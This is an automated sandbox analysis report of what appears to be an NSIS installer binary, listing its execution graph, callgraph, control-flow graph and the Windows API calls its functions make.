                                                        Has exited:true

                                                        Reset < >

                                                          Execution Graph

                                                          Execution Coverage:26.7%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:20.5%
                                                          Total number of Nodes:576
                                                          Total number of Limit Nodes:19
                                                          execution_graph 1386 403899 #17 SetErrorMode OleInitialize 1460 406312 GetModuleHandleA 1386->1460 1390 403907 GetCommandLineW 1465 40601f lstrcpynW 1390->1465 1392 403919 GetModuleHandleW 1393 403931 1392->1393 1466 405d1c 1393->1466 1396 4039ec 1397 403a0b GetTempPathW 1396->1397 1470 4037e2 1397->1470 1399 403a21 1400 403a25 GetWindowsDirectoryW lstrcatW 1399->1400 1401 403a49 DeleteFileW 1399->1401 1403 4037e2 11 API calls 1400->1403 1478 40359d GetTickCount GetModuleFileNameW 1401->1478 1402 405d1c CharNextW 1407 403952 1402->1407 1405 403a41 1403->1405 1405->1401 1408 403ae2 1405->1408 1406 403a5d 1406->1408 1410 403ac7 1406->1410 1412 405d1c CharNextW 1406->1412 1407->1396 1407->1402 1416 4039ee 1407->1416 1564 40386f 1408->1564 1506 405942 1410->1506 1426 403a74 1412->1426 1414 403be4 1420 403c67 1414->1420 1421 406312 3 API calls 1414->1421 1415 403af7 1571 405cb6 1415->1571 1575 40601f lstrcpynW 1416->1575 1423 403bf3 1421->1423 1428 406312 3 API calls 1423->1428 1424 403b0d lstrcatW lstrcmpiW 1424->1408 1430 403b29 CreateDirectoryW SetCurrentDirectoryW 1424->1430 1425 403a9f 1576 406794 1425->1576 1426->1424 1426->1425 1431 403bfc 1428->1431 1433 403b41 1430->1433 1434 403b4c 1430->1434 1435 406312 3 API calls 1431->1435 1605 40601f lstrcpynW 1433->1605 1606 40601f lstrcpynW 1434->1606 1438 403c05 1435->1438 1441 403c53 ExitWindowsEx 1438->1441 1447 403c13 GetCurrentProcess 1438->1447 1440 403b5a 1607 40601f lstrcpynW 1440->1607 1441->1420 1444 403c60 1441->1444 1442 403abc 1591 40601f lstrcpynW 1442->1591 1635 40141d 1444->1635 1450 403c23 1447->1450 1450->1441 1451 403b8f CopyFileW 1457 403b69 1451->1457 1452 403bd8 1454 406c7e 42 API calls 1452->1454 1455 403bdf 1454->1455 1455->1408 1456 40681b 18 API calls 1456->1457 1457->1452 1457->1456 1459 403bc3 CloseHandle 1457->1459 1608 40681b 1457->1608 1627 406c7e 1457->1627 1632 405c55 CreateProcessW 1457->1632 1459->1457 1461 406335 GetProcAddress 1460->1461 1462 40632a LoadLibraryA 1460->1462 1463 4038dc SHGetFileInfoW 1461->1463 1462->1461 1462->1463 1464 40601f lstrcpynW 1463->1464 1464->1390 1465->1392 1467 405d22 1466->1467 1468 403940 CharNextW 1467->1468 1469 405d29 CharNextW 1467->1469 1468->1407 1469->1467 1638 40604e 1470->1638 1472 4037f8 1472->1399 1473 4037ee 1473->1472 1647 406738 lstrlenW CharPrevW 1473->1647 1654 405e66 GetFileAttributesW CreateFileW 1478->1654 1480 4035dd 1481 4035ed 1480->1481 1655 40601f lstrcpynW 1480->1655 1481->1406 1483 403603 1656 406767 lstrlenW 1483->1656 1487 403614 GetFileSize 1502 403710 1487->1502 1505 40362b 1487->1505 1489 403719 1489->1481 1491 403755 GlobalAlloc 1489->1491 1697 403368 SetFilePointer 1489->1697 1674 403368 SetFilePointer 1491->1674 1493 4037d3 1496 4032d2 6 API calls 1493->1496 1495 403736 1498 403336 ReadFile 1495->1498 1496->1481 1497 403770 1675 40337f 1497->1675 1500 403741 1498->1500 1500->1481 1500->1491 1501 4032d2 6 API calls 1501->1505 1663 4032d2 1502->1663 1503 40377c 1503->1481 1503->1503 1504 4037aa SetFilePointer 1503->1504 1504->1481 1505->1481 1505->1493 1505->1501 1505->1502 1661 403336 ReadFile 1505->1661 1507 406312 3 API calls 1506->1507 1508 405956 1507->1508 1509 40595c 1508->1509 1510 40596e 1508->1510 1723 405f67 wsprintfW 1509->1723 1724 405ee9 RegOpenKeyExW 1510->1724 1514 4059be lstrcatW 1515 40596c 1514->1515 1714 403eab 1515->1714 1516 405ee9 3 API calls 1516->1514 1519 406794 18 API calls 1520 4059f0 1519->1520 1521 405a86 1520->1521 1523 405ee9 3 API calls 1520->1523 1522 406794 18 API calls 1521->1522 1524 405a8c 1522->1524 1525 405a22 1523->1525 1526 405a9c 1524->1526 1527 40681b 18 API calls 1524->1527 1525->1521 1529 405a45 lstrlenW 1525->1529 1535 405d1c CharNextW 1525->1535 1528 405abc LoadImageW 1526->1528 1730 403e8a 1526->1730 1527->1526 1530 405ae7 RegisterClassW 1528->1530 1531 405b7c 1528->1531 1536 405a53 lstrcmpiW 1529->1536 1537 405a79 1529->1537 1532 403ad7 1530->1532 1533 405b2f SystemParametersInfoW CreateWindowExW 1530->1533 1534 40141d 80 API calls 1531->1534 1592 4060fd 1532->1592 1533->1531 1540 405b82 1534->1540 1541 405a40 1535->1541 1536->1537 1542 405a63 GetFileAttributesW 1536->1542 1539 406738 3 API calls 1537->1539 1544 405a7f 1539->1544 1540->1532 1547 403eab 19 API calls 1540->1547 1541->1529 1545 405a6f 1542->1545 1543 405ab2 1543->1528 1729 40601f lstrcpynW 1544->1729 1545->1537 1548 406767 2 API calls 1545->1548 1549 405b93 1547->1549 1548->1537 1550 405c22 1549->1550 1551 405b9f ShowWindow LoadLibraryW 1549->1551 1735 40505d OleInitialize 1550->1735 1553 405bc5 GetClassInfoW 1551->1553 1554 405bbe LoadLibraryW 1551->1554 1556 405bd9 GetClassInfoW RegisterClassW 1553->1556 1557 405bef DialogBoxParamW 1553->1557 1554->1553 1555 405c28 1558 405c44 1555->1558 1559 405c2c 1555->1559 1556->1557 1560 40141d 80 API calls 1557->1560 1561 40141d 80 API calls 1558->1561 1559->1532 1563 40141d 80 API calls 1559->1563 1562 405c17 1560->1562 1561->1532 1562->1532 1563->1532 1565 403887 1564->1565 1566 403879 CloseHandle 1564->1566 1883 403c99 1565->1883 1566->1565 1572 405ccb 1571->1572 1573 403b05 ExitProcess 1572->1573 1574 405ce1 MessageBoxIndirectW 1572->1574 1574->1573 1575->1397 1940 40601f lstrcpynW 1576->1940 1578 4067a5 1579 405d6f 4 API calls 1578->1579 1580 4067ab 1579->1580 1581 40604e 5 API calls 1580->1581 1588 403aad 1580->1588 1586 4067bb 1581->1586 1582 4067f3 lstrlenW 1583 4067fa 1582->1583 1582->1586 1584 406738 3 API calls 1583->1584 1587 406800 GetFileAttributesW 1584->1587 1585 4062eb 2 API calls 1585->1586 1586->1582 1586->1585 1586->1588 1589 406767 2 API calls 1586->1589 1587->1588 1588->1408 1590 40601f lstrcpynW 1588->1590 1589->1582 1590->1442 1591->1410 1593 406126 1592->1593 1594 406109 1592->1594 1596 40611a 1593->1596 1597 406143 1593->1597 1598 40619d 1593->1598 1595 406113 CloseHandle 1594->1595 1594->1596 1595->1596 1596->1408 1599 4061a6 lstrcatW lstrlenW WriteFile 1597->1599 1600 40614c GetFileAttributesW 1597->1600 1598->1596 1598->1599 1599->1596 1941 405e66 GetFileAttributesW CreateFileW 1600->1941 1602 406168 1602->1596 1603 406192 SetFilePointer 1602->1603 1604 406178 WriteFile 1602->1604 1603->1598 1604->1603 1605->1434 1606->1440 1607->1457 1621 406828 1608->1621 1609 406a95 1610 403b82 DeleteFileW 1609->1610 1944 40601f lstrcpynW 1609->1944 1610->1451 1610->1457 1612 4068e9 GetVersion 1622 4068f6 1612->1622 1613 406a5c lstrlenW 1613->1621 1614 40681b 10 API calls 1614->1613 1617 405ee9 3 API calls 1617->1622 1618 406968 GetSystemDirectoryW 1618->1622 1619 40604e 5 API calls 1619->1621 1620 40697b GetWindowsDirectoryW 1620->1622 1621->1609 1621->1612 1621->1613 1621->1614 1621->1619 1942 405f67 wsprintfW 1621->1942 1943 40601f lstrcpynW 1621->1943 1622->1617 1622->1618 1622->1620 1622->1621 1623 40681b 10 API calls 1622->1623 1624 4069f5 lstrcatW 1622->1624 1625 4069af SHGetSpecialFolderLocation 1622->1625 1623->1622 1624->1621 1625->1622 1626 4069c7 SHGetPathFromIDListW CoTaskMemFree 1625->1626 1626->1622 1628 406312 3 API calls 1627->1628 1630 406c85 1628->1630 1631 406ca6 1630->1631 1945 406aaf lstrcpyW 1630->1945 1631->1457 1633 405c90 1632->1633 1634 405c84 CloseHandle 1632->1634 1633->1457 1634->1633 1636 40139d 80 API calls 1635->1636 1637 401432 1636->1637 1637->1420 1644 40605b 1638->1644 1639 4060d1 1640 4060d7 CharPrevW 1639->1640 1642 4060f7 1639->1642 1640->1639 1641 4060c4 CharNextW 1641->1639 1641->1644 1642->1473 1643 405d1c CharNextW 1643->1644 1644->1639 1644->1641 1644->1643 1645 4060b0 CharNextW 1644->1645 1646 4060bf CharNextW 1644->1646 1645->1644 1646->1641 1648 403800 CreateDirectoryW 1647->1648 1649 406755 lstrcatW 1647->1649 1650 405e95 1648->1650 1649->1648 1651 405ea2 GetTickCount GetTempFileNameW 1650->1651 1652 403814 1651->1652 1653 405ed8 1651->1653 1652->1399 1653->1651 1653->1652 1654->1480 1655->1483 1657 406776 1656->1657 1658 403609 1657->1658 1659 40677c CharPrevW 1657->1659 1660 40601f lstrcpynW 1658->1660 1659->1657 1659->1658 1660->1487 1662 403357 1661->1662 1662->1505 1664 4032f3 1663->1664 1665 4032db 1663->1665 1668 403303 GetTickCount 1664->1668 1669 4032fb 1664->1669 1666 4032e4 DestroyWindow 1665->1666 1667 4032eb 1665->1667 1666->1667 1667->1489 1671 403311 CreateDialogParamW ShowWindow 1668->1671 1672 403334 1668->1672 1698 406348 1669->1698 1671->1672 1672->1489 1674->1497 1676 40339a 1675->1676 1677 4033c7 1676->1677 1702 403368 SetFilePointer 1676->1702 1679 403336 ReadFile 1677->1679 1680 4033d2 1679->1680 1681 403529 1680->1681 1682 4033eb GetTickCount 1680->1682 1685 4033d6 1680->1685 1683 403579 1681->1683 1686 40352d 1681->1686 1682->1685 1696 403414 1682->1696 1684 403336 ReadFile 1683->1684 1684->1685 1685->1503 1686->1685 1688 403336 ReadFile 1686->1688 1689 403551 WriteFile 1686->1689 1687 403336 ReadFile 1687->1696 1688->1686 1689->1685 1690 403566 1689->1690 1690->1685 1690->1686 1692 403577 1690->1692 1691 403466 GetTickCount 1691->1696 1692->1685 1693 40348f MulDiv wsprintfW 1703 404f88 1693->1703 1695 4034d3 WriteFile 1695->1685 1695->1696 1696->1685 1696->1687 1696->1691 1696->1693 1696->1695 1697->1495 1699 406365 PeekMessageW 1698->1699 1700 403301 1699->1700 1701 40635b DispatchMessageW 1699->1701 1700->1489 1701->1699 1702->1677 1704 404fa1 1703->1704 1705 405045 1703->1705 1706 404fbf lstrlenW 1704->1706 1707 40681b 18 API calls 1704->1707 1705->1696 1708 404fe8 1706->1708 1709 404fcd lstrlenW 1706->1709 1707->1706 1711 404ffb 1708->1711 1712 404fee SetWindowTextW 1708->1712 1709->1705 1710 404fdf lstrcatW 1709->1710 1710->1708 1711->1705 1713 405001 SendMessageW SendMessageW SendMessageW 1711->1713 1712->1711 1713->1705 1715 403ebf 1714->1715 1743 405f67 wsprintfW 1715->1743 1717 403f33 1718 40681b 18 API calls 1717->1718 1719 403f3f SetWindowTextW 1718->1719 1720 403f5a 1719->1720 1721 403f75 1720->1721 1722 40681b 18 API calls 1720->1722 1721->1519 1722->1720 1723->1515 1725 40599f 1724->1725 1726 405f1d RegQueryValueExW 1724->1726 1725->1514 1725->1516 1727 405f3f RegCloseKey 1726->1727 1727->1725 1729->1521 1744 40601f lstrcpynW 1730->1744 1732 403e9e 1733 406738 3 API calls 1732->1733 1734 403ea4 lstrcatW 1733->1734 1734->1543 1745 403dc5 1735->1745 1737 403dc5 SendMessageW 1738 4050bb OleUninitialize 1737->1738 1738->1555 1739 4062b9 11 API calls 1740 405080 1739->1740 1740->1739 1742 4050ab 1740->1742 1748 40139d 1740->1748 1742->1737 1743->1717 1744->1732 1746 403ddd 1745->1746 1747 403dce SendMessageW 1745->1747 1746->1740 1747->1746 1751 4013a4 1748->1751 1749 401410 1749->1740 1751->1749 1752 4013dd MulDiv SendMessageW 1751->1752 1753 4015a0 1751->1753 1752->1751 1754 4015fa 1753->1754 1829 40160c 1753->1829 1755 401601 1754->1755 1756 401742 1754->1756 1757 401962 1754->1757 1758 4019ca 1754->1758 1759 40176e 1754->1759 1760 401650 1754->1760 1761 4017b1 1754->1761 1762 401672 1754->1762 1763 401693 1754->1763 1764 401616 1754->1764 1765 4016d6 1754->1765 1766 401736 1754->1766 1767 401897 1754->1767 1768 4018db 1754->1768 1769 40163c 1754->1769 1770 4016bd 1754->1770 1754->1829 1777 4062b9 11 API calls 1755->1777 1783 401751 ShowWindow 1756->1783 1784 401758 1756->1784 1774 40145c 18 API calls 1757->1774 1781 40145c 18 API calls 1758->1781 1771 40145c 18 API calls 1759->1771 1860 4062b9 lstrlenW wvsprintfW 1760->1860 1866 40145c 1761->1866 1772 40145c 18 API calls 1762->1772 1863 401446 1763->1863 1780 40145c 18 API calls 1764->1780 1795 401446 18 API calls 1765->1795 1765->1829 1882 405f67 wsprintfW 1766->1882 1773 40145c 18 API calls 1767->1773 1778 40145c 18 API calls 1768->1778 1782 401647 PostQuitMessage 1769->1782 1769->1829 1779 4062b9 11 API calls 1770->1779 1785 401775 1771->1785 1786 401678 1772->1786 1787 40189d 1773->1787 1788 401968 GetFullPathNameW 1774->1788 1777->1829 1791 4018e2 1778->1791 1792 4016c7 SetForegroundWindow 1779->1792 1793 40161c 1780->1793 1794 4019d1 SearchPathW 1781->1794 1782->1829 1783->1784 1797 401765 ShowWindow 1784->1797 1784->1829 1798 4062b9 11 API calls 1785->1798 1799 4062b9 11 API calls 1786->1799 1878 4062eb FindFirstFileW 1787->1878 1801 40197f 1788->1801 1843 4019a1 1788->1843 1790 40169a 1803 4062b9 11 API calls 1790->1803 1804 40145c 18 API calls 1791->1804 1792->1829 1805 4062b9 11 API calls 1793->1805 1794->1829 1795->1829 1797->1829 1807 401785 SetFileAttributesW 1798->1807 1835 401683 1799->1835 1826 4062eb 2 API calls 1801->1826 1801->1843 1802 4062b9 11 API calls 1809 4017c9 1802->1809 1810 4016a7 Sleep 1803->1810 1811 4018eb 1804->1811 1812 401627 1805->1812 1815 40179a 1807->1815 1807->1829 1871 405d6f CharNextW CharNextW 1809->1871 1810->1829 1821 40145c 18 API calls 1811->1821 1822 404f88 25 API calls 1812->1822 1814 40139d 65 API calls 1814->1829 1823 4062b9 11 API calls 1815->1823 1816 4018c2 1827 4062b9 11 API calls 1816->1827 1817 4018a9 1825 4062b9 11 API calls 1817->1825 1820 4019b8 GetShortPathNameW 1820->1829 1828 4018f5 1821->1828 1822->1829 1823->1829 1824 404f88 25 API calls 1824->1829 1825->1829 1830 401991 1826->1830 1827->1829 1832 4062b9 11 API calls 1828->1832 1829->1751 1830->1843 1881 40601f lstrcpynW 1830->1881 1831 401864 1831->1835 1836 40186e 1831->1836 1834 401902 MoveFileW 1832->1834 1833 405d1c CharNextW 1838 4017e6 CreateDirectoryW 1833->1838 1839 401912 1834->1839 1840 40191e 1834->1840 1835->1824 1841 404f88 25 API calls 1836->1841 1844 4017fe GetLastError 1838->1844 1856 4017d4 1838->1856 1839->1835 1845 401942 1840->1845 1850 4062eb 2 API calls 1840->1850 1842 401875 1841->1842 1877 40601f lstrcpynW 1842->1877 1843->1820 1843->1829 1847 401827 GetFileAttributesW 1844->1847 1848 40180b GetLastError 1844->1848 1852 4062b9 11 API calls 1845->1852 1847->1856 1853 4062b9 11 API calls 1848->1853 1849 4062b9 11 API calls 1849->1856 1854 401929 1850->1854 1851 401882 SetCurrentDirectoryW 1851->1829 1855 40195c 1852->1855 1853->1856 1854->1845 1857 406c7e 42 API calls 1854->1857 1855->1829 1856->1831 1856->1833 1856->1849 1858 401936 1857->1858 1859 404f88 25 API calls 1858->1859 1859->1845 1861 4060fd 9 API calls 1860->1861 1862 401664 1861->1862 1862->1814 1864 40681b 18 API calls 1863->1864 1865 401455 1864->1865 1865->1790 1867 40681b 18 API calls 1866->1867 1868 401488 1867->1868 1869 401497 1868->1869 1870 40604e 5 API calls 1868->1870 1869->1802 1870->1869 1872 405d8c 1871->1872 1875 405d9e 1871->1875 1874 405d99 CharNextW 1872->1874 1872->1875 1873 405dc2 1873->1856 1874->1873 1875->1873 1876 405d1c CharNextW 1875->1876 1876->1875 1877->1851 1879 406301 FindClose 1878->1879 1880 4018a5 1878->1880 1879->1880 1880->1816 1880->1817 1881->1843 1882->1829 1884 403ca7 1883->1884 1885 40388c 1884->1885 1886 403cac FreeLibrary GlobalFree 1884->1886 1887 406cb1 1885->1887 1886->1885 1886->1886 1888 406794 18 API calls 1887->1888 1889 406cc4 1888->1889 1890 406ce4 1889->1890 1891 406ccd DeleteFileW 1889->1891 1893 406e61 1890->1893 1938 40601f lstrcpynW 1890->1938 1892 403898 OleUninitialize 1891->1892 1892->1414 1892->1415 1893->1892 1896 406e6e 1893->1896 1900 4062eb 2 API calls 1893->1900 1895 406d0f 1897 406d23 1895->1897 1898 406d19 lstrcatW 1895->1898 1905 4062b9 11 API calls 1896->1905 1901 406767 2 API calls 1897->1901 1899 406d29 1898->1899 1903 406d39 lstrcatW 1899->1903 1904 406d2f 1899->1904 1902 406e7a 1900->1902 1901->1899 1902->1892 1907 406738 3 API calls 1902->1907 1906 406d41 lstrlenW FindFirstFileW 1903->1906 1904->1903 1904->1906 1905->1892 1908 406e51 1906->1908 1920 406d68 1906->1920 1909 406e84 1907->1909 1908->1893 1911 4062b9 11 API calls 1909->1911 1910 405d1c CharNextW 1910->1920 1912 406e8f 1911->1912 1935 405e46 GetFileAttributesW 1912->1935 1916 406e2e FindNextFileW 1917 406e46 FindClose 1916->1917 1916->1920 1917->1908 1918 406ea3 1918->1896 1922 406ea9 1918->1922 1919 406eda 1921 404f88 25 API calls 1919->1921 1920->1910 1920->1916 1923 4062b9 11 API calls 1920->1923 1925 406cb1 72 API calls 1920->1925 1927 405e46 2 API calls 1920->1927 1932 404f88 25 API calls 1920->1932 1933 404f88 25 API calls 1920->1933 1934 406c7e 42 API calls 1920->1934 1939 40601f lstrcpynW 1920->1939 1921->1892 1924 4062b9 11 API calls 1922->1924 1923->1920 1926 406eb3 1924->1926 1925->1920 1928 404f88 25 API calls 1926->1928 1929 406de4 DeleteFileW 1927->1929 1930 406ebd 1928->1930 1929->1920 1931 406c7e 42 API calls 1930->1931 1931->1892 1932->1916 1933->1920 1934->1920 1936 405e63 RemoveDirectoryW 1935->1936 1937 405e55 SetFileAttributesW 1935->1937 1936->1918 1936->1919 1937->1936 1938->1895 1939->1920 1940->1578 1941->1602 1942->1621 1943->1621 1944->1610 1946 406ad4 1945->1946 1947 406afd GetShortPathNameW 1945->1947 1971 405e66 GetFileAttributesW CreateFileW 1946->1971 1949 406b16 1947->1949 1950 406c78 1947->1950 1949->1950 1952 406b1e WideCharToMultiByte 1949->1952 1950->1631 1951 406add CloseHandle GetShortPathNameW 1951->1950 1953 406af5 1951->1953 1952->1950 1954 406b3b WideCharToMultiByte 1952->1954 1953->1947 1953->1950 1954->1950 1955 406b53 wsprintfA 1954->1955 1956 40681b 18 API calls 1955->1956 1957 406b7f 1956->1957 1972 405e66 GetFileAttributesW CreateFileW 1957->1972 1959 406b8c 1959->1950 1960 406b99 GetFileSize GlobalAlloc 1959->1960 1961 406bba ReadFile 1960->1961 1962 406c6e CloseHandle 1960->1962 1961->1962 1963 406bd4 1961->1963 1962->1950 1963->1962 1973 405dcc lstrlenA 1963->1973 1966 406c01 1968 405dcc 4 API calls 1966->1968 1967 406bed lstrcpyA 1969 406c0f 1967->1969 1968->1969 1970 406c46 SetFilePointer WriteFile GlobalFree 1969->1970 1970->1962 1971->1951 1972->1959 1974 405e0d lstrlenA 1973->1974 1975 405de6 lstrcmpiA 1974->1975 1976 405e15 1974->1976 1975->1976 1977 405e04 CharNextA 1975->1977 1976->1966 1976->1967 1977->1974 1978 40324c 1979 403277 1978->1979 1980 40325e SetTimer 1978->1980 1981 4032cc 1979->1981 1982 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 1979->1982 1980->1979 1982->1981 1983 40548f 1984 4055e3 1983->1984 1985 4054a7 1983->1985 1987 4055f4 GetDlgItem GetDlgItem 1984->1987 1992 405634 1984->1992 1985->1984 1986 4054b3 1985->1986 1989 4054d1 1986->1989 1990 4054be SetWindowPos 1986->1990 2052 403d55 1987->2052 1988 40568e 1993 403dc5 SendMessageW 1988->1993 2006 40559d 1988->2006 1994 4054d6 ShowWindow 1989->1994 1995 4054ee 1989->1995 1990->1989 1992->1988 1997 40139d 80 API calls 1992->1997 2040 4056a0 1993->2040 1994->1995 1998 405510 1995->1998 1999 4054f6 DestroyWindow 1995->1999 1996 40561e SetClassLongW 2000 40141d 80 API calls 1996->2000 2003 405666 1997->2003 2001 405515 SetWindowLongW 1998->2001 2002 405526 1998->2002 2004 4058f2 1999->2004 2000->1992 2001->2006 2005 405532 GetDlgItem 2002->2005 2002->2006 2003->1988 2007 40566a SendMessageW 2003->2007 2004->2006 2012 405923 ShowWindow 2004->2012 2010 405562 2005->2010 2011 405545 SendMessageW IsWindowEnabled 2005->2011 2007->2006 2008 40141d 80 API calls 2008->2040 2009 4058f4 DestroyWindow EndDialog 2009->2004 2014 40556f 2010->2014 2016 4055b6 SendMessageW 2010->2016 2017 405582 2010->2017 2023 405567 2010->2023 2011->2006 2011->2010 2012->2006 2013 40681b 18 API calls 2013->2040 2014->2016 2014->2023 2016->2006 2018 40558a 2017->2018 2019 40559f 2017->2019 2022 40141d 80 API calls 2018->2022 2021 40141d 80 API calls 2019->2021 2020 403d55 19 API calls 2020->2040 2021->2023 2022->2023 2023->2006 2049 403d2e 2023->2049 2024 403d55 19 API calls 2025 40571b GetDlgItem 2024->2025 2026 405730 2025->2026 2027 405739 ShowWindow EnableWindow 2025->2027 2026->2027 2055 403d9b EnableWindow 2027->2055 2029 405763 EnableWindow 2032 405777 2029->2032 2030 40577c GetSystemMenu EnableMenuItem SendMessageW 2031 4057ac SendMessageW 2030->2031 2030->2032 2031->2032 2032->2030 2056 403dae SendMessageW 2032->2056 2057 40601f lstrcpynW 2032->2057 2035 4057da lstrlenW 2036 40681b 18 API calls 2035->2036 2037 4057f0 SetWindowTextW 2036->2037 2038 40139d 80 API calls 2037->2038 2038->2040 2039 405834 DestroyWindow 2039->2004 2041 40584e CreateDialogParamW 2039->2041 2040->2006 2040->2008 2040->2009 2040->2013 2040->2020 2040->2024 2040->2039 2041->2004 2042 405881 2041->2042 2043 403d55 19 API calls 2042->2043 2044 40588c GetDlgItem GetWindowRect ScreenToClient SetWindowPos 2043->2044 2045 40139d 80 API calls 2044->2045 2046 4058d2 2045->2046 2046->2006 2047 4058da ShowWindow 2046->2047 2048 403dc5 SendMessageW 2047->2048 2048->2004 2050 403d35 2049->2050 2051 403d3b SendMessageW 2049->2051 2050->2051 2051->2006 2053 40681b 18 API calls 2052->2053 2054 403d60 SetDlgItemTextW 2053->2054 2054->1996 2055->2029 2056->2032 2057->2035

                                                          Callgraph

                                                          • Executed
                                                          • Not Executed
                                                          • Opacity -> Relevance
                                                          • Disassembly available
                                                          callgraph 0 Function_00405942 14 Function_0040505D 0->14 17 Function_00406767 0->17 18 Function_00405F67 0->18 20 Function_00405EE9 0->20 26 Function_00403C7E 0->26 35 Function_00403E8A 0->35 37 Function_00406312 0->37 38 Function_00406794 0->38 44 Function_0040681B 0->44 46 Function_00405D1C 0->46 49 Function_0040141D 0->49 50 Function_0040601F 0->50 54 Function_00403EAB 0->54 61 Function_00406738 0->61 1 Function_00403DC5 2 Function_00405E46 3 Function_00401446 30 Function_00405F80 3->30 3->44 4 Function_00406348 5 Function_0040744B 24 Function_00407577 5->24 33 Function_00407308 5->33 6 Function_00405DCC 7 Function_0040324C 8 Function_0040604E 8->46 52 Function_00405E22 8->52 63 Function_00405D3B 8->63 9 Function_004032D2 9->4 10 Function_00405C55 11 Function_00403D55 11->44 12 Function_00407EDB 13 Function_0040145C 13->8 13->44 14->1 47 Function_0040139D 14->47 62 Function_004062B9 14->62 15 Function_004037E2 15->8 39 Function_00405E95 15->39 15->61 15->63 16 Function_00405E66 19 Function_00403368 21 Function_004062EB 22 Function_00405D6F 22->46 23 Function_0040386F 43 Function_00403C99 23->43 58 Function_00406CB1 23->58 24->12 31 Function_00407501 24->31 32 Function_00407E07 24->32 53 Function_004074AB 24->53 25 Function_004060FD 25->16 27 Function_00406C7E 27->37 57 Function_00406AAF 27->57 28 Function_0040137E 28->30 29 Function_0040337F 29->5 29->19 34 Function_00404F88 29->34 59 Function_00403336 29->59 34->44 35->50 35->61 36 Function_0040548F 36->1 36->11 36->44 45 Function_00403D9B 36->45 36->47 36->49 36->50 55 Function_00403DAE 36->55 56 Function_00403D2E 36->56 38->8 38->17 38->21 38->22 38->50 38->61 40 Function_00403816 41 Function_00407297 42 Function_00403899 42->0 42->10 42->12 42->15 42->23 42->25 42->27 42->37 42->38 42->40 42->44 42->46 48 Function_0040359D 42->48 42->49 42->50 60 Function_00405CB6 42->60 43->26 44->8 44->18 44->20 44->44 44->50 47->28 51 Function_004015A0 47->51 48->9 48->16 48->17 48->19 48->29 48->41 48->50 48->52 48->59 49->47 51->3 51->13 51->18 51->21 51->22 51->27 51->28 51->34 51->46 51->47 51->50 51->62 54->18 54->30 54->44 57->6 57->16 57->44 57->52 58->2 58->17 58->21 58->27 58->34 58->38 58->46 58->50 58->58 58->61 58->62 62->25

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 143 403899-40392f #17 SetErrorMode OleInitialize call 406312 SHGetFileInfoW call 40601f GetCommandLineW call 40601f GetModuleHandleW 150 403931-403934 143->150 151 403939-40394d call 405d1c CharNextW 143->151 150->151 154 4039e0-4039e6 151->154 155 403952-403958 154->155 156 4039ec 154->156 157 403962-403966 155->157 158 40395a-403960 155->158 159 403a0b-403a23 GetTempPathW call 4037e2 156->159 161 403968-40396d 157->161 162 40396e-403972 157->162 158->157 158->158 166 403a25-403a43 GetWindowsDirectoryW lstrcatW call 4037e2 159->166 167 403a49-403a63 DeleteFileW call 40359d 159->167 161->162 164 403974-40397b 162->164 165 4039ce-4039db call 405d1c 162->165 169 403990-4039a2 call 403816 164->169 170 40397d-403984 164->170 165->154 179 4039dd 165->179 166->167 183 403ae2-403af1 call 40386f OleUninitialize 166->183 167->183 184 403a65-403a6b 167->184 181 4039a4-4039ab 169->181 182 4039b7-4039cc call 403816 169->182 174 403986-403989 170->174 175 40398b 170->175 174->169 174->175 175->169 179->154 186 4039b2 181->186 187 4039ad-4039b0 181->187 182->165 197 4039ee-403a06 call 407edb call 40601f 182->197 195 403be4-403bea 183->195 196 403af7-403b07 call 405cb6 ExitProcess 183->196 189 403acb-403ad2 call 405942 184->189 190 403a6d-403a76 call 405d1c 184->190 186->182 187->182 187->186 199 403ad7-403add call 4060fd 189->199 202 403a8f-403a91 190->202 204 403c67-403c6f 195->204 205 403bec-403c09 call 406312 * 3 195->205 197->159 199->183 207 403a93-403a9d 202->207 208 403a78-403a8a call 403816 202->208 209 403c71 204->209 210 403c75 204->210 234 403c53-403c5e ExitWindowsEx 205->234 235 403c0b-403c0d 205->235 214 403b0d-403b27 lstrcatW lstrcmpiW 207->214 215 403a9f-403aaf call 406794 207->215 208->207 222 403a8c 208->222 209->210 214->183 220 403b29-403b3f CreateDirectoryW SetCurrentDirectoryW 214->220 215->183 228 403ab1-403ac7 call 40601f * 2 215->228 225 403b41-403b47 call 40601f 220->225 226 403b4c-403b6c call 40601f * 2 220->226 222->202 225->226 245 403b71-403b8d call 40681b DeleteFileW 226->245 228->189 234->204 238 403c60-403c62 call 40141d 234->238 235->234 239 403c0f-403c11 235->239 238->204 239->234 243 403c13-403c25 GetCurrentProcess 239->243 243->234 251 403c27-403c49 243->251 249 403bce-403bd6 245->249 250 403b8f-403b9f CopyFileW 245->250 249->245 253 403bd8-403bdf call 406c7e 249->253 250->249 252 403ba1-403bc1 call 406c7e call 40681b call 405c55 250->252 251->234 252->249 263 403bc3-403bca CloseHandle 252->263 253->183 263->249
                                                          APIs
                                                          • #17.COMCTL32 ref: 004038B8
                                                          • SetErrorMode.KERNELBASE(00008001), ref: 004038C3
                                                          • OleInitialize.OLE32(00000000), ref: 004038CA
                                                            • Part of subcall function 00406312: GetModuleHandleA.KERNEL32(?,?,00000020,004038DC,00000008), ref: 00406320
                                                            • Part of subcall function 00406312: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038DC,00000008), ref: 0040632B
                                                            • Part of subcall function 00406312: GetProcAddress.KERNEL32(00000000), ref: 0040633D
                                                          • SHGetFileInfoW.SHELL32(00409264,00000000,?,000002B4,00000000), ref: 004038F2
                                                            • Part of subcall function 0040601F: lstrcpynW.KERNEL32(?,?,00002004,00403907,007E95E0,NSIS Error), ref: 0040602C
                                                          • GetCommandLineW.KERNEL32(007E95E0,NSIS Error), ref: 00403907
                                                          • GetModuleHandleW.KERNEL32(00000000,008420A0,00000000), ref: 0040391A
                                                          • CharNextW.USER32(00000000,008420A0,00000020), ref: 00403941
                                                          • GetTempPathW.KERNEL32(00002004,008560C8,00000000,00000020), ref: 00403A16
                                                          • GetWindowsDirectoryW.KERNEL32(008560C8,00001FFF), ref: 00403A2B
                                                          • lstrcatW.KERNEL32(008560C8,\Temp), ref: 00403A37
                                                          • DeleteFileW.KERNELBASE(008520C0), ref: 00403A4E
                                                          • OleUninitialize.OLE32(?), ref: 00403AE7
                                                          • ExitProcess.KERNEL32 ref: 00403B07
                                                          • lstrcatW.KERNEL32(008560C8,~nsu.tmp), ref: 00403B13
